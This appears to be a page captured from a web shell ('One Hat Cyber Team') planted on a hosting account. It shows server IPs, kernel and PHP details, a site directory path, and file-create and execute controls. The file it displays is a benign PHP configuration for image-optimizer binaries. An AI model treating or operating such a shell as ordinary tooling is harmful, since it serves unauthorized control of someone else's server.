⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.96
Server IP:
50.6.168.112
Server:
Linux server-617809.webnetzimbabwe.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
Server Software:
Apache
PHP Version:
8.4.10
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
ctaacademy
/
public_html
/
config
/
View File Name :
image-optimizer.php
[ Jpegoptim::class => [ '-m85', // set maximum quality to 85% '--strip-all', // this strips out all text information such as comments and EXIF data '--all-progressive', // this will make sure the resulting image is a progressive one ], Pngquant::class => [ '--force', // required parameter for this package ], Optipng::class => [ '-i0', // this will result in a non-interlaced, progressive scanned image '-o2', // this set the optimization level to two (multiple IDAT compression trials) '-quiet', // required parameter for this package ], Svgo::class => [ '--disable=cleanupIDs', // disabling because it is know to cause troubles ], Gifsicle::class => [ '-b', // required parameter for this package '-O3', // this produces the slowest but best results ], Cwebp::class => [ '-m 6', // for the slowest compression method in order to get the best compression. '-pass 10', // for maximizing the amount of analysis pass. '-mt', // multithreading for some speed improvements. '-q 90', // quality factor that brings the least noticeable changes. ], ], /* * The directory where your binaries are stored. * Only use this when you binaries are not accessible in the global environment. */ 'binary_path' => '', /* * The maximum time in seconds each optimizer is allowed to run separately. */ 'timeout' => 60, /* * If set to `true` all output of the optimizer binaries will be appended to the default log. * You can also set this to a class that implements `Psr\Log\LoggerInterface`. */ 'log_optimizer_activity' => false, ];